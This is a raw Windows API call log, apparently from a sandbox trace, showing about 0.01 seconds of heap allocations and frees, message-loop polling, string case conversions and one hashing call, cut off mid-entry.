[0198.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.807] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.807] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.807] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.807] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.807] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.807] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.808] CryptHashData (hHash=0xaa58e0, pbData=0x24b16c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0198.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0198.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.813] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0198.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.813] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.813] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.814] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.814] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.814] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.814] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.815] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.815] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.815] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree 